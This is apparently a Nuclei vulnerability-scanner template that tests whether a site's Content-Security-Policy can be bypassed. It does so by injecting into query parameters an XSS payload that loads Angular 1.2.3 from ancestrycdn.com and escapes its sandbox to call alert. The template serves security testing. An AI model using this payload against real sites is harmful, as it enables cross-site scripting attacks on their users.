id: ancestrycdn-angular-csp-bypass
info:
name: Content-Security-Policy Bypass - AncestryCDN Angular
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,ancestrycdn-angular,vuln
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "ancestry.com"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: ancestrycdn_angular_csp_xss
args:
max-duration: 5s
payloads:
injection:
- <body ng-app ng-csp><script src="https://www.ancestrycdn.com/ui-static/lib/angular/1.2.3/angular.min.js"></script><div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == \'window\'">{{ [1].reduce(value.alert, 1); }}</div></div></div></body>
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "ancestrycdn_angular_csp_xss == true"
# digest: 4b0a0048304602210081bc4aa3f69b6c4c2e485894a9f5657e41d8e3bd4e02291078fa81f4ce1933f20221008ae9654e15a4353be049866b870c24a06e3cff062b88a5ee1935e2f4b980eb56:922c64590222798bb761d5b6d8e72950